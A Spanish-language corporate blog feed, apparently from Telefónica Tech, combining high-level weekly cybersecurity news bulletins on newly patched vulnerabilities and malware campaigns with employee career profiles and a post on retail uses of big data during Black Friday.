robo de billeteras de criptomonedas. Cabe indicar que dicha campaña llevaría produciéndose desde el pasado mes de septiembre y que apunta tanto a sistemas Windows como macOS. Más info Nueva vulnerabilidad 0-day dispone de parche no official Los investigadores de 0patch Team han descubierto una nueva vulnerabilidad 0-day que permitiría a un atacante capturar credenciales NTLM engañando a las víctimas para que abran un archivo malicioso en el explorador de Windows. Aunque no se han publicado más detalles sobre la vulnerabilidad, que aún no habría sido asignado un CVE, los investigadores habrían confirmado que esta permitiría que un actor malicioso robara los hashes NTLM cuando el usuario abre desde una carpeta compartida, un USB o desde la carpeta descargas, un archivo especialmente diseñado para tal efecto. Los investigadores habrían comunicado el fallo a Microsoft, ya que este afectaría a todas las versiones de Windows desde Windows 7 y Server 2008 R2 hasta las últimas Windows 11 24H2 y Server 2022. Aunque Microsoft aún no ha publicado ninguna solución de seguridad, desde 0patch Team han ofrecido a sus usuarios un micro-parche para el fallo, al menos hasta la publicación de parches oficiales. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
13 de diciembre de 2024
#WomenWithTech: Amparo Romero, de niña curiosa a experta en Ciberseguridad
Amparo, consultora en Govertis, parte de Telefónica Tech, y experta en GRC y en Ciberseguridad habla de su trayectoria, especialización y de cómo equilibra su carrera con su vida personal. ______ Cuéntanos un poco sobre ti: ¿quién eres y a qué te dedicas? Soy Amparo, consultora GRC en Govertis, parte de Telefónica Tech, y responsable del Centro de Competencia del Esquema Nacional de Seguridad (ENS). Nos especializamos en apoyar a nuestros clientes en el ámbito de la ciberseguridad, brindándoles asesoría para implementar y gestionar proyectos siguiendo los marcos normativos y regulatorios establecidos, con el objetivo de reducir los riesgos tecnológicos y asegurar una adecuada gobernanza. ¿Cuál es tu especialización? ¿Cómo llegaste a dedicarte a lo que haces ahora? Estudié ingeniería de telecomunicaciones y cuando finalicé la carrera me dediqué una temporada a la investigación gracias a una beca. Unos meses antes de finalizar la beca sentí la necesidad de hacer un cambio de rumbo y especializarme en la Ciberseguridad. ¿Tenías claro que querías dedicarte al mundo de la tecnología desde pequeña? ¿Ha sido algo vocacional? Desde pequeña tenía claro que quería dedicarme al mundo de la tecnología. Me encantaban los teléfonos móviles, tenía muchísima curiosidad de saber cómo funcionaban, cómo era posible que nos pudiéramos comunicar sin cable y cómo viajaban los SMS… Un día escuchando la radio con mi padre hablaron de los ingenieros de telecomunicaciones, de las salidas profesionales que tenían y la gran demanda de profesionales que iban a ser necesarios en el futuro. En ese momento, tuve claro que quería ser ingeniera. "Las personas que se preparan son capaces de percibir mucho mejor las oportunidades cuando se presentan", dice Amparo. ¿Qué o quién te motivó a escoger una profesión relacionada con la tecnología? Me motivó mi interés por las comunicaciones móviles y los consejos de mis padres. Al final, ellos buscan los mejor para sus hijos y sabían que estos estudian te brindaban un futuro y una trayectoria profesional. ¿Cómo describirías tu trayectoria profesional hasta ahora y cuáles son las habilidades que utilizas en Telefónica Tech? Mi trayectoria profesional hasta ahora ha sido un viaje de aprendizaje continuo y evolución en distintos roles y áreas. He tenido la oportunidad de trabajar en proyectos desafiantes, donde he podido desarrollar y perfeccionar mis habilidades tanto técnicas como de liderazgo. Mi trayectoria profesional ha sido un viaje de aprendizaje y evolución en diversos roles y áreas. A lo largo de mi carrera he aprendido a adaptarme rápidamente a nuevos entornos, a mejorar en la resolución de problemas y a gestionar equipos multidisciplinarios. Esto me ha permitido crecer en mi capacidad de tomar decisiones estratégicas y trabajar bajo presión dentro de entornos muy dinámicos y competitivos. ¿Cómo concilias tu puesto de alta responsabilidad con tu vida personal? Con una buena organización. Intento gestionar el tiempo de manera eficiente, y para ello me apoyo en utilizar herramientas como calendarios y listas de tareas que me ayudan a priorizar. Saber priorizar es fundamental, es muy importante establecer que es urgente y que es esencial, tanto en lo personal como en lo profesional. Saber priorizar es esencial, tanto en lo personal como en lo profesional. Asimismo, Govertis, parte de Telefónica Tech, ofrece diversas facilidades para lograr un buen equilibrio entre el trabajo y la vida personal. Como he podido comprobar tras verme afectada por la dana de Valencia, esta apuesta por la flexibilidad permite equilibrar mis responsabilidades profesionales con mi vida personal incluso en circunstancias imprevistas. ¿Qué hace de Telefónica Tech un excelente lugar de trabajo para las mujeres y cómo promueve la empresa la diversidad de género y la inclusión? Telefónica Tech destaca por su fuerte compromiso con la diversidad de género y la inclusión. Se promueve un entorno de trabajo equitativo mediante varias iniciativas como políticas de igualdad de género, programas de desarrollo y liderazgo, cultura inclusiva y flexibilidad laboral. ¿Podrías explicarnos qué significa para ti la iniciativa #WomenWithTech? Esta iniciativa tiene como objetivo impulsar la igualdad de género, motivar a las próximas generaciones de mujeres a estudiar carreras en áreas STEAM (Ciencia, Tecnología, Ingeniería, Artes y Matemáticas), romper barreras y estereotipos, apoyar el crecimiento profesional y fomentar una cultura inclusiva que valore la diversidad de puntos de vista. Las mujeres aportamos representación femenina a las profesiones STEAM y contribuimos a reducir la brecha de género." ¿Qué consejo darías a otras mujeres que desean seguir una carrera STEAM y qué habilidades crees que son importantes para tener éxito en el sector de la tecnología? Mi consejo es que se preparen, que se formen y estudien. Hay una frase de Séneca que dice que “la suerte es donde confluyen la preparación y la oportunidad.” Las personas que se preparan, que se forman y que visualizan el objetivo que desean alcanzar, son capaces de percibir mucho mejor las oportunidades que se les presentan. Y, afortunadamente, estas oportunidades surgen en un sector con una gran necesidad de profesionales debido al constante cambio tecnológico. Desde mi punto de vista y particularizando en el ámbito de la consultoría, las habilidades más importantes para tener éxito en el sector son la adaptabilidad a los cambios. Es importante ser ágil para aprender nuevas herramientas, metodologías, requisitos legales…. También, las habilidades comunicativas, ya que es necesario saber escuchar para comprender realmente las necesidades del cliente y saber explicar las soluciones que respondan a sus requerimientos. Y, por último, pero no menos importante, destacaría el trabajo en equipo. La clave del éxito en tecnología es prepararse, adaptarse, comunicarse eficazmente y trabajar en equipo.
12 de diciembre de 2024
Boletín Semanal de Ciberseguridad, 23 - 29 noviembre
Google elimina sitios de noticias falsas de la operación Glassbridge Google ha eliminado de Google News y Google Discover multitud de sitios y dominios de noticias que difundían de manera coordinada narrativas pro-China que apoyaban las iniciativas gubernamentales, procediendo de varias empresas que colaborarían en una operación de influencia posiblemente vinculada al gobierno. Así, se identificó un grupo paraguas de cuatro empresas con sede en China denominado Glassbridge: Shanghai Haixun Technology, Times Newswire, Durinbridge y Shenzhen Bowen Media. Estas compañías solían ocultar sus funciones o tergiversar sus contenidos como cobertura informativa local e independiente, dirigiéndose a la diáspora de habla china e inglesa de países de Oriente Próximo, Europa del Este, Asia, África y de Estados Unidos. Asimismo, las empresas solían compartír los mismos contenidos, reproduciendo comunicados de prensa entre las distintas redes de sitios web de noticias falsas. A su vez, los sitios reeditaban artículos del medio chino Global Times o creaban piezas centradas en las reivindicaciones territoriales de Pekín o la pandemia del Covid-19, entre otros asuntos. Más info Vulnerabilidad en 7-Zip permite ejecución de código remoto Investigadores de Zero Day Initiative han publicado un aviso de seguridad en donde alertan sobre el descubrimiento de una nueva vulnerabilidad en 7-Zip. En concreto, dicho fallo de seguridad ha sido registrado como CVE-2024-11477, CVSSv3 de 7.8 según Zero Day Initiative, que afecta a la biblioteca de descompresión Zstandard en 7-Zip y se debe a un desbordamiento de enteros en la implementación de descompresión Zstandard, lo que podría provocar corrupción de memoria y permitir a actores maliciosos realizar una ejecución remota de código. En base a estos hechos, se recomienda actualizar el activo a la versión 24.07 para solucionar el problema. Más info La botnet de Matrix abusa de contraseñas predeterminadas en dispositivos IoT Investigadores de Aqua Nautilus han descubierto una nueva campaña de ataques de denegación de servicio distribuido (DDoS) realizado por un actor de amenazas conocido como Matrix. El ataque se basa en el abuso de contraseñas débiles o predeterminadas y también en la explotación de vulnerabilidades conocidas en servidores, routers y dispositivos IoT como cámaras IP o DVR. Matrix también emplea bots de Discord y una tienda en Telegram para operar y monetizar sus servicios de ataque. La campaña de Matrix podría llegar a afectar hasta 35 millones de dispositivos en todo el mundo, con un enfoque particular en regiones con alta adopción de dispositivos IoT como China y Japón. Más info Parcheadas seis vulnerabilidades en GitLab, una de ellas con severidad alta GitLab ha publicado nuevas actualizaciones que parchean problemas en Community Edition (CE) y Enterprise Edition (EE). En concreto, la organización ha publicado parches para seis fallos, cinco de ellos clasificados por GitLab como de severidad media y uno de severidad alta. La vulnerabilidad con mayor severidad de este conjunto de parches ha sido denominada CVE-2024-8114, CVSSv3 8.2 según proveedor, y permitiría a un atacante explotar Tokens de Acceso Personal (PAT) para escalar privilegios en todas las versiones de GitLab CE y EE desde la 8.12. Con respecto a los fallos con severidad media, estos incluyen dos vulnerabilidades que permitirían a un actor malicioso llevar a cabo una Denegación de Servicio (CVE-2024-8237, CVSSv3 6.5 según fabricante, y CVE-2024-8177, CVSSv3 5.3 según GitLab), así como un fallo de brecha en la revocación de tokens de endpoints de streaming (CVE-2024-11668, CVSSv3 4.2 según fabricante), uno de agotamiento de recursos mediante llamadas a la API (CVE-2024-11828, CVSSv3 4.3 vsegún fabricante) y uno de acceso no intencionado a datos de uso a través de tokens de alcance (CVE-2024-11669 , CVSSv3 6.5 según fabricante). Más info NachoVPN permite explotar vulnerabilidades de VPN para ser controladas por un atacante Los investigadores de AmberWolf han publicado una nueva herramienta en GitHub, a la que han denominado NachoVPN, que permite explotar vulnerabilidades de los clientes de GlobalProtect VPN de Palo Alto Networks y SonicWall NetExtender. En concreto, NachoVPN permite a sus usuarios instalar actualizaciones maliciosas en los software mencionados que no han parcheado las vulnerabilidades CVE-2024-5921, CVSSv4 7.1 según Palo Alto Networks, y CVE-2024-29014, CVSSv3 8.8, que afecta a NetExtender. Además de permitir conectar las VPN mencionadas a servidores controlados por el atacante, empleando documentos distribuidos mediante ingeniería social o usando páginas web maliciosas, la herramienta presenta la capacidad de robar las credenciales de acceso de la víctima, instalar malware mediante actualizaciones, instalar certificados root maliciosos e incluso ejecutar código con privilegios altos. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
29 de noviembre de 2024
5 usos de los Datos en Black Friday
Existen muchas historias sobre cómo surgió el término Black Friday. Una creencia común, aunque errónea, es que el nombre proviene del primer día del año en que los comercios pasan de tener pérdidas (en números rojos) a generar ganancias (en números negros). Sin embargo, el origen real del término se encuentra en Filadelfia, en los años 60, cuando la policía lo utilizaba para describir el caos que seguía al Día de Acción de Gracias. Para la década de 1980, los comercios habían transformado el término a su favor, y en los años posteriores se convertiría en el fenómeno que conocemos hoy. Cada año, como consumidores, gastamos más dinero y, por lo tanto, generamos más datos. En este blog exploraremos las principales formas en que tanto compradores como comercios pueden aprovechar el Big Data durante el periodo de Black Friday. 1. Aprovechando los datos Big Data es una realidad que llegó para quedarse, y las empresas en todos los sectores lo están utilizando como una parte integral de su modelo de negocio. Para los comercios y tiendas online la gran pregunta es: ¿Puedes permitirte no aprovechar el Big Data? Esta pregunta cobra aún más relevancia durante Black Friday, ya que el potencial de ganancias es mayor que nunca. Además de las tecnologías de Big Data, cada vez más empresas están utilizando servicios de Machine Learning, como Hadoop, para comprender mejor a sus clientes. La ventaja de estos métodos sobre los tradicionales es que pueden proporcionar análisis en tiempo real. A partir de datos históricos y actuales, los algoritmos de aprendizaje automático pueden incorporar numerosas variables en sus modelos, como patrones climáticos previstos. ¿El resultado? La capacidad no solo de predecir tendencias en los gustos de los consumidores, sino también de estimar cuánto gastarán y dónde lo harán. 2. Preparándose para el gran día Meses de preparación preceden la llegada de Black Friday debido a su importancia para los comercios. Con las tecnologías basadas en datos mencionadas anteriormente, se pueden tomar decisiones clave sobre la gestión de inventarios y la contratación de trabajadores temporales con mayor confianza. Cada año, la Federación Nacional de Minoristas (NRF, por sus siglas en inglés) de Estados Unidos realiza varias encuestas, una de las cuales reveló que se espera contratar entre 500.000 y 550.000 trabajadores estacionales este año. Al aprovechar el Big Data, las tiendas pueden prever el número de compradores y contratar la cantidad adecuada de empleados, mejorando así su eficiencia operativa. La eficiencia también es clave en la gestión de inventarios. Es fundamental contar con cantidades suficientes de los productos más vendidos para que los clientes no se vayan con las manos vacías. Al mismo tiempo, las tiendas quieren evitar grandes cantidades de inventario sobrante. Aunque una parte importante del Black Friday radica en el entusiasmo que genera el stock limitado, las empresas deben (y lo hacen) utilizar técnicas de modelado basadas en datos para prepararse para la avalancha de compradores. 3. Estableciendo el precio adecuado Estas técnicas de modelado también pueden aplicarse a las estrategias de precios. Black Friday se caracteriza por sus precios bajos, pero es un día en el que los comercios obtienen enormes beneficios. En los últimos años, han surgido políticas de precios interesantes. Grandes marcas van más allá de igualar precios y se permiten ofrecer precios un 10% más bajos que la competencia. El sitio web Greentoe introduce una política de “ponga su precio” en muchos productos, una forma de diferenciarse del resto. Encontrar el equilibrio entre un precio competitivo y un margen de beneficio sólido no es fácil, pero aprovechar los datos lo hace significativamente más sencillo. Una de las grandes ventajas de las herramientas de Big Data es que pueden analizar datos en tiempo real, y los algoritmos de aprendizaje automático pueden considerar factores como la competencia para llegar a un precio más preciso. 4. Alcanzando a los clientes adecuados En marketing, el acrónimo STP (Segmentación, Targeting y Posicionamiento) se refiere al proceso que deben seguir las marcas para tener éxito. Es excelente tener el inventario correcto y los mejores precios, pero todo esto es inútil si los clientes no ven tus productos. Utilizando fuentes de datos internas y externas, los comercios pueden emplear ciencia de datos para crear segmentos más precisos que los obtenidos con métodos tradicionales. Dado que los datos de los consumidores se agregan y anonimizan, es posible hacerlo respetando la privacidad que valoramos. Una vez segmentados, los comercios pueden dirigirse a clientes potenciales con las ofertas que más les interesan. Por ejemplo, durante la semana previa al Black Friday, recibí correos electrónicos diarios de Amazon con ofertas personalizadas, basadas en los datos recopilados de mi historial de compras. Como mencionaré más adelante, los consumidores anhelan una relación personalizada con las marcas que les gustan, y una comunicación dirigida como esta posiciona a las marcas como protagonistas en la primera etapa del viaje de decisión del consumidor: las consideraciones iniciales. 5. Mejorando la experiencia de compra Una de las tendencias más importantes en los últimos años ha sido la hiperconectividad de nuestra sociedad. Raramente vamos a algún lugar sin nuestro teléfono, especialmente cuando vamos de compras. De alguna manera, nuestro teléfono actúa como un asistente de ventas, ayudándonos a tomar decisiones de compra más inteligentes. Otra tendencia es que los consumidores buscan una conexión más cercana con las marcas que eligen, pero también quieren interactuar con ellas en sus propios términos. Para lograrlo, los comercios deben adoptar un enfoque omnicanal, con presencia en redes sociales, sitios web optimizados para móviles y servicio al cliente en tiempo real. Esta experiencia personalizada es clave durante Black Friday, pero aún más en Cyber Monday, cuando las grandes ventas se trasladan al entorno digital. Con tantas opciones para comprar, las marcas deben crear conexiones personales con sus clientes para asegurarse de ser elegidas. El análisis de Big Data proporciona información clave que puede fortalecer la relación entre marca y consumidor, y en Telefónica Tech creemos que esta tendencia solo crecerá en el futuro. ¿Y tú? ¿Participas en las ofertas de Black Friday? Quizás prefieres comprar desde la comodidad de tu hogar en Cyber Monday o decidiste no participar y evitar las multitudes. Sea cual sea tu elección, es muy probable que el Big Data juegue un papel más importante que nunca. ______ Ciberseguridad Black Friday: 10 recomendaciones para comprar más seguro 23 de noviembre de 2023
28 de noviembre de 2024
De becario a empleado: un camino de aprendizajes que nos acompaña para siempre
Soy Frescia Mogrovejo y trabajo en el área de Generación de Demanda para la región Hispam. Hace un poco más de 3 años estuve buscando trabajo en una plataforma muy conocida en mi país y nunca me imaginé que acabaría desarrollándome en una multinacional tan conocida y con la capacidad de enriquecer mi conocimiento en el sector B2B, formarme como líder, que me permite mostrar mis habilidades multifacéticas y donde he conocido a tantas personas destacadas. En Perú las prácticas profesionales se dividen en las preprofesionales, las que se realizan durante los últimos ciclos de la universidad, y las profesionales, que son las practicas que se realizan tras obtener el grado de bachiller. Cada universidad tiene su propia bolsa de trabajo, pero existen diversas plataformas que soportan la búsqueda de trabajos. “Ayudar a otro a ser exitoso permitirá que nosotros también lo seamos” es una frase que dice mucho mi hermano que siempre intento poner en práctica. Aunque que cada persona debe vivir sus propias experiencias, compartir las nuestras y dar a conocer nuestras decisiones puede ayudar a otros a tener una perspectiva más clara, añadir matices e inspirar a que cada persona se forme su propia opinión. Ser practicante o becario es una etapa transformadora tanto a nivel personal como profesional. Este crecimiento es clave para sentar las bases de una carrera sólida y exitosa. Mi acceso a una posición de prácticas Cuando solicité la plaza de Telefónica Tech la convocatoria estuvo identificada por una reclutadora líder en su ámbito. Por lo tanto, no se visualizó el nombre de la empresa misma, pero si notificaron que se trataba de una compañía tecnológica multinacional. Por supuesto que añadí la plaza a mi lista y la solicité. Me contactaron, pasé una serie de entrevistas y me seleccionaron para el puesto de practicante profesional de marketing. Hace tres años que la modalidad de trabajo era remota. Aun así los primeros días fueron una montaña rusa con una buena dosis de nervios, pero con la felicidad de sentirte parte de una empresa grande y reconocida en el país. La conexión con mi jefa fue sorprendente, y en menos de 6 meses aprendí mucho de ella y de mis compañeros. No solo académicamente sino de los valores y la ética como empleado de Telefónica Tech. A los días me llegó un set de merchandising hermoso que acompañaba mis días de trabajo remoto. Definitivamente la distancia no impidió que me integrara fácilmente a la familia de Telefónica Tech. Sentí orgullo de compartir en mis redes sociales mi nuevo trabajo y la motivación dentro y fuera de mi ambiente laboral se iba incrementando más y más. El largo camino de aprendizajes es un regalo que nos acompaña para siempre. También hay desafíos, por supuesto. Cada día es un desafío al sentir que trabajo con personas altamente capacitadas. Esto me motiva y fomenta el esfuerzo continuo para cumplir con las expectativas. Hasta la fecha considero que, con mi experiencia, puedo aportar un poco más a la empresa, lo cual también abordo como un reto. Aprendizaje y desarrollo en Telefónica Tech Durante las prácticas mis responsabilidades fueron duversas. Aunque ya tenía experiencias laborales previas, esta experiencia profesional después del bachillerato fue única. Sientes un poco más de presión por aplicar todo lo aprendido en los 5 o 6 años de universidad. A decir verdad, es más el aprendizaje obtenido que demostrar la parte académica, y no solo el trabajo de marketing en mi caso, sino en muchas más áreas que se complementan entre sí para cualquier acción. Los aprendizajes y habilidades adquiridas durante mi experiencia como practicante son innumerables entre habilidades blandas y técnicas, pero me quedo con estas: Ser proactivo. No solo hacer lo que te piden hacer, darle un toque de visión a tu trabajo. Ser multifacético. Aprender de diversas áreas ampliará tus cualidades profesionales y serás más competitivo. Obtener cada vez más experiencia en el trabajo para adquirir mayor nivel de conocimiento, responsabilidad y autoridad dentro de una organización. Trabajo en equipo. Desarrollar la capacidad de colaborar con otros para alcanzar objetivos comunes Resolver y solucionar problemas en tiempo limitado. Adquieres destrezas para resolver situaciones imprevistas, adaptarte a cambios de manera eficiente. Conocimiento del sector y, en mi caso, manejo de herramientas nuevas de marketing. Uno de los cambios más grandes para mí fue el hecho de trabajar en una multinacional, al tener un alcance y una presencia global con estrategias y decisiones alineadas a nivel internacional. Al tener compañeros de trabajo en diferentes países la cultura es diversa y me permite captar una mentalidad global e integrarme con todo culturalmente. Además, las oportunidades de crecimiento son mayores, ya que en Telefónica Tech he podido capacitarme en un entorno internacional y eso enriquece mi perfil profesional. Mi recomendación para cualquiera que esté en prácticas es que aproveche cada oportunidad que tenga para adquirir nuevas habilidades y conocimientos de todos sus compañeros, de cualquier área. Gracias al apoyo recibido de compañeros y superiores he absorbido mucho conocimiento técnico, pero lo que más valoro y llevaré siempre conmigo son las habilidades blandas que he aprendido de ellos. Son cualidades que refuerzan mis cualidades como persona y contribuyeron a mi experiencia, profesionalidad y ética. Retos y expectativas Como era la primera vez que entraba como practicante profesional en una empresa a tiempo completo, mis desafíos me enfrentaban a diario: desde mandar o responder un simple correo hasta entrar a una reunión a modo escucha. A la vez me sentí una esponja que absorbió cada día como nuevos aprendizajes. Afortunadamente, he superado estos desafíos teniendo presente que estoy empleada en una de las empresas líderes del país, que fui seleccionada entre numerosas vacantes, y siendo consciente de que mi potencial se reflejará gradualmente en mi desempeño laboral. De becario a empleado de Telefónica Tech Gracias a la beca gané confianza en mis habilidades. Siempre tuve la expectativa de aprender de mis compañeros, demostrar mis capacidades y cumplir mis expectativas, que siempre fue aprender de mis compañeros y demostrar mis capacidades. Las responsabilidades aumentaron a medida que obtuve más seniority y comencé a liderar proyectos. Al liderar, el trabajo se volvió más independiente y la toma de decisiones representó un desafío. Después de un año como practicante, me contrataron. El proceso fue sencillo porque siempre me sentí apoyada por mis compañeros. Obtuve experiencia rápidamente al liderar proyectos en el área regional, lo que fue crucial para desarrollar nuevas habilidades competitivas. Crecimiento profesional La experiencia como practicante tuvo un gran impacto a nivel profesional, una de ellas la confianza en mis capacidades, la optimización del tiempo y ser multitarea. Saber trabajar en equipo y desarrollar un modelo de gobierno con mis propios proyectos implica obtener nuevas capacidades a nivel profesional. En definitiva, ser practicante en una multinacional es una etapa formativa crucial que sienta mis bases para el éxito profesional. El talento son las capacidades naturales o adquiridas de una persona y que se expresan mediante destrezas. Creo que todos tenemos uno o más talentos. Ahora mis metas profesionales son aprender y formarme profesionalmente en el mundo B2B. El camino del aprendizaje es ilimitado y el sector tecnológico evoluciona rápidamente, por lo que tenemos que estar en constante capacitaciones a nivel técnico. Mi recomendación para cualquiera que esté en prácticas es que aproveche cada oportunidad que tenga para adquirir nuevas habilidades y conocimientos de todos sus compañeros, sin diferenciar las áreas, y que construya relaciones de networking. Aceptar lo feedback de los compañeros ayuda a mejorar cada día. Conclusión Mi período de practicante duró un año y estuvo lleno de aprendizajes tanto en temas técnicos como en habilidades blandas. Al ser empleado las responsabilidades son mayor, pero la transición te ayuda obtener capacidades de liderazgo y autonomía. Por lo que en cada etapa siempre he encontrado nuevo que aportar a nivel personal y profesional. El camino del aprendizaje es ilimitado y el sector tecnológico evoluciona rápidamente, por lo que tenemos que estar en constante capacitaciones a nivel técnico. El proceso de ser practicante es una etapa transformadora tanto a nivel personal como profesional. Mi mayo habilidad repotenciada es la confianza en uno mismo, además de mejorar mis habilidades de organización y adaptabilidad. Profesionalmente, he obtenido varias fortalezas de competencias técnicas que me hará una profesional competitiva en el trabajo. Este crecimiento es clave para sentar las bases de una carrera sólida y exitosa. El largo camino de aprendizajes es un regalo que se quedará conmigo por siempre. Telefónica Tech ha facilitado mi adaptación en estos tres años. Disfruto de trabajar en un entorno innovador y aprender de expertos en tecnología. Me quedo con las habilidades blandas e interpersonales que serán valiosas durante toda mi carrera profesional. Agradezco profundamente la confianza y el apoyo recibidos, ya que esta oportunidad me ha acercado un paso más a alcanzar mis metas y a crecer como profesional en un campo tan dinámico como lo es el de la tecnología. ______ Telefónica Tech De becario a empleado: mi experiencia de aprendizaje y crecimiento en Telefónica Tech 29 de abril de 2024
26 de noviembre de 2024
Boletín Semanal de Ciberseguridad, 16 - 22 noviembre
NSO Group desarrolló exploits para instalar Pegasus a través de WhatsApp NSO Group utilizó varios exploits 0-day que aprovechaban vulnerabilidades de WhatsApp para desplegar el spyware Pegasus en ataques zero-click. Según documentación judicial, NSO desarrolló el exploit Heaven en 2018 suplantando al instalador oficial de la aplicación para desplegar Pegasus. En 2019, desarrolló otro exploit, Eden, para eludir las protecciones implementadas en 2018. WhatsApp parcheó ambos e inhabilitó las cuentas de NSO. El último exploit desarrollado por la empresa, Erised, utilizaba los servidores de retransmisión de WhatsApp para instalar Pegasus. El proceso de instalación se iniciaría cuando un cliente de NSO introducía el número de teléfono móvil de un objetivo en un programa ejecutado en su ordenador, desencadenando la instalación remota de Pegasus en los dispositivos de los objetivos, dirigiéndose al sector gubernamental europeo. Más info Corregidas 0-day en firewalls PAN-OS bajo explotación activa Palo Alto ha corregido dos vulnerabilidades 0-day en sus firewalls NGFW. La primera, identificada como CVE-2024-0012, CVSSv4 de 9.3 según fabricante, es un fallo de bypass de autenticación que permite a atacantes obtener privilegios administrativos. La segunda, rastreada como CVE-2024-9474, CVSSv4 6.9 según Palo Alto, se trata de un error que permite una escalada de privilegios a root. Ambas afectan a PAN-OS 10.2, 11.0, 11.1 y 11.2, mientras que Cloud NGFW y Prisma Access no están comprometidos. Los ataques que aprovechan estas fallas han explotado interfaces de gestión expuestas a redes no confiables, con actividades como ejecución de comandos y despliegue de webshells. Palo Alto Networks recomienda aplicar los parches, restringir el acceso a direcciones IP internas confiables, seguir las mejores prácticas de seguridad y revisar indicadores de compromiso. Más info Finastra, proveedor de 45 de los 50 bancos más grandes del mundo, reconoce un incidente Según ha informado el investigador de seguridad Brian Krebs, Finastra, proveedor de software financiero que cuenta con más de 8 000 clientes en 130 países, incluidas 45 de las 50 instituciones bancarias más grandes del mundo, ha enviado un comunicado a sus clientes en el que informa de un acceso no autorizado a su servidor SFTP, alojado en IBM Aspera, mediante el cual se habría producido una exfiltración de información. De acuerdo con la compañía, el actor de amenazas no desplegó malware ni manipuló ningún archivo de cliente dentro del entorno. De forma simultánea al envío de dicho comunicado, el 8 de noviembre un usuario de BreachForums bajo el alias abyss0 puso a la venta 400 gigabytes exfiltrados que supuestamente pertenecerían a la compañía, los cuales aparentemente incluirían un volumen indeterminado de datos de clientes. No obstante, Finastra ha indicado que faltaría por determinar el alcance y la naturaleza de los datos contenidos en los archivos filtrados. Más info Corregido un fallo crítico en Microsoft Kerberos Microsoft ha corregido una vulnerabilidad crítica en el protocolo de autenticación de identidades host y usuario Microsoft Kerberos. El fallo, CVE-2024-43639 y CVSSv3 de 9.8, permite a atacantes no autenticados enviar a sistemas vulnerables solicitudes falsificadas para obtener accesos no autorizado y ejecutar código remoto, aprovechando una vulnerabilidad del protocolo criptográfico. En adición, Censys señaló que más de 1 millón de instancias de Windows Server expuestas serían vulnerables, puesto que se encontrarían afectados los servidores configurados con el proxy Kerberos KDC. Asimismo, más de la mitad de estos dispositivos fueron encontrados con el puerto TCP/443 abierto, encontrándose el 34% de los servidores vulnerables en Estados Unidos, y el 11% asociados al proveedor de TI Armstrong Enterprise Communications. Con el fin de mitigar riesgos, se recomienda aplicar las actualizaciones correspondientes lo antes posible. Más info Ataques mediante técnica ClickFix Investigadores de Proofpoint publicaron una investigación informando sobre campañas de ataque de ingeniería social mediante la técnica conocida como ClickFix. En concreto, esta técnica fue observada en un inicio siendo utilizada por el actor malicioso TA571 a principios de año. Sin embargo, numerosos grupos han ido implementándola entre tus metodologías de ataque. La técnica consiste en utilizar ventanas que contienen mensajes de error falsos para engañar a las personas para que copien, peguen y ejecuten contenido malicioso en su equipo. Proofpoint ha observado campañas de ClickFix que conducen a malware como AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, entre otros. Asimismo, cabe indicar que puede darse a través de sitios web, documentos, archivos adjuntos HTML, URL maliciosas, entre otros, que han sido comprometidos. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros → ____ Ciberseguridad La importancia de la Detección y Respuesta de Amenazas en el ámbito de la identidad 16 de julio de 2024
22 de noviembre de 2024
Boletín de Ciberseguridad, 9 - 15 noviembre
Ivanti corrige múltiples vulnerabilidades en sus productos La compañía Ivanti ha publicado su Patch Tuesday para corregir múltiples vulnerabilidades en sus productos Ivanti Connect Secure (ICS), Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC). De entre los fallos de seguridad publicados en su boletín, destacan ocho considerados como críticos que afectan a sus productos señalados. En concreto, se tratan de las vulnerabilidades registradas como CVE-2024-38655, CVE-2024-38656, CVE-2024-39710, CVE-2024-39711, CVE-2024-39712, CVE-2024-11005, CVE-2024-11006 y CVE-2024-11007 todas ellas con CVSSv3 de 9.1. Cabe indicar que estas vulnerabilidades se describen como fallos de inyección de argumentos y comandos que podrían permitir a atacantes autenticados con privilegios de administrador realizar una ejecución de código remoto. En base a ello, Ivanti recomienda a sus usuarios actualizar los productos a las siguientes versiones Connect Secure versión 22.7R2.3 y Policy Secure versión 22.7R1.2 para corregir estos fallos como el resto de los publicados. Más info Patch Tuesday de Microsoft corrige 91 vulnerabilidades, incluidas cuatro 0-days Microsoft ha publicado el aviso correspondiente al Patch Tuesday del mes de noviembre, el cual incluye actualizaciones de seguridad para 91 fallos. Entre estos, se observan cuatro vulnerabilidades 0-day, dos de las cuales habrían sido explotadas activamente. En concreto, se tratan de los fallos registrados como CVE-2024-43451, CVSSv3 de 6.5, el cual produce una suplantación de divulgación de hash NTLM que expone los hashes NTLMv2 a atacantes remotos con una interacción mínima del usuario, así como de la vulnerabilidad CVE-2024-49039, CVSSv3 de 8.8, de elevación de privilegios del Programador de tareas de Windows que permite a los atacantes ejecutar funciones de RPC normalmente restringidas a cuentas privilegiadas derivando en una ejecución de código o acceso a recursos no autorizados. En cuanto a las otras dos vulnerabilidades, CVE-2024-49040, CVSSv3 de 7.5 y CVE-2024-49041, se tratan de fallos de suplantación de identidad en Microsoft Exchange Server y MSHTML respectivamente. Más info Confluencias entre el nuevo ransomware Ymir y RustyStealer Los investigadores de Kaspersky han publicado un informe en el que señalan la asociación entre el nuevo ransomware Ymir con el infostealer RustyStealer en sus operaciones. Según los expertos, esta nueva cepa de ransomware destaca por su ejecución en memoria, el uso del idioma africano lingala en su código, utilizar un cifrado ChaCha20, el uso de archivos PDF como notas de rescate y sus opciones de configuración de extensiones. Asimismo, Kaspersky señala que Ymir se conecta a servidores externos que podrían facilitar la exfiltración de datos, ya que este ransomware no tiene tal capacidad. En cuanto al informe, además, analiza la participación de RustyStealer, software malicioso que se encarga de la recolección de credenciales y permite a los atacantes obtener acceso no autorizado a los sistemas al comprometer cuentas legítimas con altos privilegios al conseguir realizar movimientos laterales una vez se accede a la red de la víctima. Ymir ha sido visto atacando víctimas en Colombia. Más info Campaña maliciosa distribuyendo Strela Stealer en Alemania, España y Ucrania El equipo de investigadores de IBM X-Force ha publicado una investigación en la que informa sobre la detección de una campaña de distribución del malware Strela Stealer por parte del actor malicioso denominado 